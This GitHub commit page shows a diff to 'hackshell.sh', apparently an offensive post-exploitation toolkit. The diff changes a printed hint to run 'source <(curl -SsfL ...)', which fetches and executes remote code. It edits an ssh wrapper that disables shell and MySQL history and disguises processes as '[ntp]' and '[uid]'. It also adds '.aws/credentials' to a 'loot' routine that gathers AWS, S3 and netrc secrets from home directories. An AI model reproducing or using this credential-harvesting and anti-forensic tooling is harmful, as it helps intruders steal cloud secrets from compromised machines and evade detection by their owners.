Skip to content

Commit

Permalink
reset to null
Browse files Browse the repository at this point in the history
  • Loading branch information
rootTHC committed Oct 16, 2024
1 parent 1eb42be commit 711e9f4
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions hackshell.sh
Original file line number Diff line number Diff line change
Expand Up @@ -148,11 +148,11 @@ xssh() {
opts=("-oControlMaster=auto" "-oControlPath=\"${XHOME}/.ssh-unix.%C\"" "-oControlPersist=15")
}
}
echo -e "May need to cut & paste: ${CDC}source <(${_HSURL})${CN}"
echo -e "May need to cut & paste: ${CDC}source <(curl -SsfL ${_HSURL})${CN}"
stty raw -echo icrnl opost
\ssh "${HS_SSH_OPT[@]}" "${opts[@]}" -T \
"$@" \
"unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=/dev/null TERM=xterm-256color HISTFILE=/dev/null BASH_HISTORY=/dev/null exec -a [ntp] script -qc 'source <(resize); exec -a [uid] bash -i' /dev/null"
"unset SSH_CLIENT SSH_CONNECTION; LESSHISTFILE=- MYSQL_HISTFILE=/dev/null TERM=xterm-256color HISTFILE=/dev/null BASH_HISTORY=/dev/null exec -a [ntp] script -qc 'source <(resize 2>/dev/null); exec -a [uid] bash -i' /dev/null"
stty "${ttyp}"
}

Expand Down Expand Up @@ -981,6 +981,7 @@ loot() {
_loot_homes "AWS S3" ".s3backer_passwd"
_loot_homes "AWS S3" ".passwd-s3fs"
_loot_homes "AWS S3" ".boto"
_loot_homes "AWS S3" ".aws/credentials"
_loot_homes "NETRC" ".netrc"
# SSRF
Expand Down

0 comments on commit 711e9f4

Please sign in to comment.